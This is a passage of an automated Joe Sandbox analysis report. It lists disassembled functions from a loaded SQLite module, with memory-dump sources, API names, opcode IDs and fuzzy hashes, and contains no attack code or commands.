                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3992148849-0
                                                                                                    • Opcode ID: 966d3bdd9b7ec2c637396d11471a01c6ca43b8ab05bb269a022240967d8b712a
                                                                                                    • Instruction ID: 0e2c23331c16ee84630063ef5aef98a0784d42d9ec2d87b3402f6ad6c8ba083b
                                                                                                    • Opcode Fuzzy Hash: 966d3bdd9b7ec2c637396d11471a01c6ca43b8ab05bb269a022240967d8b712a
                                                                                                    • Instruction Fuzzy Hash: 33918675E046598FDB05CFA8C8A069DBBF1BF8A324F29C21AE87497394D770D842CB51
                                                                                                    Function 61E6E7E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 182COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6E7F9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6EA09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$INTEGER$<a$a
                                                                                                    • API String ID: 1477753154-2175779638
                                                                                                    • Opcode ID: d96a0b779c40d877e4a5ea39f1b8b94e9ebd00cb949280cc5aa1c7409108143f
                                                                                                    • Instruction ID: e9e397302c3e127faf88cdbef33f3d2741ed8d540d40db6e1a65927733d023d1
                                                                                                    • Opcode Fuzzy Hash: d96a0b779c40d877e4a5ea39f1b8b94e9ebd00cb949280cc5aa1c7409108143f
                                                                                                    • Instruction Fuzzy Hash: 8F713C74A44A599FDB00CFAAC88479EBBF5BF48358F69C129EC58A7380D734D841CB90
                                                                                                    Function 61E1BBF2 Relevance: 7.8, APIs: 5, Instructions: 340COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1984881590-0
                                                                                                    • Opcode ID: 5422215c925a4c1103006817d788c6ebf1975ae7803c617e75f824470805e615
                                                                                                    • Instruction ID: 4046693fdad71867530765ecb70e61449d3145db7261924f97f5e02b0f474fec
                                                                                                    • Opcode Fuzzy Hash: 5422215c925a4c1103006817d788c6ebf1975ae7803c617e75f824470805e615
                                                                                                    • Instruction Fuzzy Hash: 65E1E475E08249CFDB04CF68C481A9ABBF2FF88314F25C569E815AB359D734E952CB90
                                                                                                    Function 61E88B90 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 61E88BC9
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BDA
                                                                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BE2
                                                                                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BEA
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E88BF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 1445889803-0
                                                                                                    • Opcode ID: f979607e9c19fe23d2a6c795d640752146a977690ceef806feb967e8c33f18e5
                                                                                                    • Instruction ID: 0a5873e2bc5124469f1366149606b3e9f6f9164544f02eb58db9808e09a7cadc
                                                                                                    • Opcode Fuzzy Hash: f979607e9c19fe23d2a6c795d640752146a977690ceef806feb967e8c33f18e5
                                                                                                    • Instruction Fuzzy Hash: F511ACB55153058FDB40DFB8E48855FBBE4FB89664F05093AE448C7301DB35D489C792
                                                                                                    Function 61E427CB Relevance: 6.4, APIs: 4, Instructions: 418COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E427E0
                                                                                                      • Part of subcall function 61E134FC: sqlite3_mutex_try.SQLITE3(?,?,?,61E1357C), ref: 61E1349C
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E427F9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4290D
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E42D28
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 2068833801-0
                                                                                                    • Opcode ID: 9dd1dee0b090503883bfa7540a95ac35d5294d1cb050199fd299c94f222e3818
                                                                                                    • Instruction ID: f8e54874a3c2ac4bcf1411c80c60bbf1a4d80081bb58b7faf65da07f2dce8136
                                                                                                    • Opcode Fuzzy Hash: 9dd1dee0b090503883bfa7540a95ac35d5294d1cb050199fd299c94f222e3818
                                                                                                    • Instruction Fuzzy Hash: B8021474A046068FDB10CFA9E480A9DFBF1BFA8318F25C529E855DB311DB74E842CB40
                                                                                                    Function 61E29157 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E29199
                                                                                                      • Part of subcall function 61E29044: sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    • sqlite3_bind_double.SQLITE3 ref: 61E291BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465616180-0
                                                                                                    • Opcode ID: 969964f748c3dbf5faddc566b324f44d6478a9ff4673fe3bfaa9967b1d7da70a
                                                                                                    • Instruction ID: 21126599560bac39a215f10e5636eacba757eb216256e2242c3340fbe41f308c
                                                                                                    • Opcode Fuzzy Hash: 969964f748c3dbf5faddc566b324f44d6478a9ff4673fe3bfaa9967b1d7da70a
                                                                                                    • Instruction Fuzzy Hash: DF218EB15087249FDB04DF59E4A06A5BBE0FF49320F24D55EEDA84B391D335C881CB82
                                                                                                    Function 61E2923E Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29258
                                                                                                    • sqlite3_bind_zeroblob.SQLITE3 ref: 61E2927D
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E2929D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2187339821-0
                                                                                                    • Opcode ID: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                                                                    • Instruction ID: 71bda0ac54a0e0f173b124d792c8bb8ee147aaa1bb55a03425212694f7a1fb7d
                                                                                                    • Opcode Fuzzy Hash: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                                                                    • Instruction Fuzzy Hash: 7E012C796046699FCB00DFA9D0D095ABBF5FFCA724F24C46AE8488B314D734E851CB92
                                                                                                    Function 61E16EBE Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16E4C
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16EAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 48c463444376657ded0004d134018bdbfcc168c884925203ef9f971fdb27fca6
                                                                                                    • Instruction ID: 6f1205b9ad66009288743075ffbbb1bc87bc448d2be142b5ebb8d24004af2559
                                                                                                    • Opcode Fuzzy Hash: 48c463444376657ded0004d134018bdbfcc168c884925203ef9f971fdb27fca6
                                                                                                    • Instruction Fuzzy Hash: 60210C34A042498FDB04DFA9C485BD9FBF4FF49318F1482A9E818AB351D375E981CB91
                                                                                                    Function 61E16CEE Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16D04
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16D44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 27b6bc3c0785caa816c047c42d63a6dd31fce7a2cf21e26673dd918fbb3152da
                                                                                                    • Instruction ID: 1e2e910003095778f6cebcb838fd535ec4183f5e406275462525bcf1277eb772
                                                                                                    • Opcode Fuzzy Hash: 27b6bc3c0785caa816c047c42d63a6dd31fce7a2cf21e26673dd918fbb3152da
                                                                                                    • Instruction Fuzzy Hash: 88F0A4356092518BC710AF65C8C17A9BBF4FF88318F158669DC444F31AD774D881C792
                                                                                                    Function 61E28EB6 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28E94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: bbad3c19f50a0cafe5bea3184aa4d8b6261d835df48a7b8c0a6acde9386d72dc
                                                                                                    • Instruction ID: 99da794d51fb7a5f37e097f078c17b12067314453bea113c198efbf97311cb5d
                                                                                                    • Opcode Fuzzy Hash: bbad3c19f50a0cafe5bea3184aa4d8b6261d835df48a7b8c0a6acde9386d72dc
                                                                                                    • Instruction Fuzzy Hash: 81214B70A046599FCB04DF69C890AAEBBF5BF8D328F14C159F8589B344D734D942CB91
                                                                                                    Function 61E290EA Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29148
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 794dbc1f4e92bb5712f785c81f9bc129935f5ab6ca0155c7af6b4ee24a0c02fd
                                                                                                    • Instruction ID: 8cd1412836525fddc1f94add5b7d05503b3ae2e0628091867ec4d64ee6273232
                                                                                                    • Opcode Fuzzy Hash: 794dbc1f4e92bb5712f785c81f9bc129935f5ab6ca0155c7af6b4ee24a0c02fd
                                                                                                    • Instruction Fuzzy Hash: A2014B346003469BC704DF6AD484A4AFBB4FF88368F18D669E8188B301D375E991CBD1
                                                                                                    Function 61E28FDF Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29035
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: ff4d8dd4e19a215a357fca00da9fdbdd28e79193f1e9e77d4c97ffce1a45f84f
                                                                                                    • Instruction ID: d8c396a136f550eb71d4d5a7bbb5359ef1b9783d01fd6555b331c9173bc2dada
                                                                                                    • Opcode Fuzzy Hash: ff4d8dd4e19a215a357fca00da9fdbdd28e79193f1e9e77d4c97ffce1a45f84f
                                                                                                    • Instruction Fuzzy Hash: 81F0A43160061A9BCB00AF65D8C489DBBB4FF8C368F10C068EC849B310D734D965C795
                                                                                                    Function 61E29044 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: c467ac68fe0a212b9099146cbc90d08f01a6bdc9334889231f6145c3b7cd7bdf
                                                                                                    • Instruction ID: fe57e0d1baf191b392be2e29975a9e65a4fad9f055637f66f35aa77ba23109c9
                                                                                                    • Opcode Fuzzy Hash: c467ac68fe0a212b9099146cbc90d08f01a6bdc9334889231f6145c3b7cd7bdf
                                                                                                    • Instruction Fuzzy Hash: 53F03A39B002199B8B00DF69D9C089EBBF9FF89224B148126EC149B305D334E956CBA1
                                                                                                    Function 61E290B9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28CF3: sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E290DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
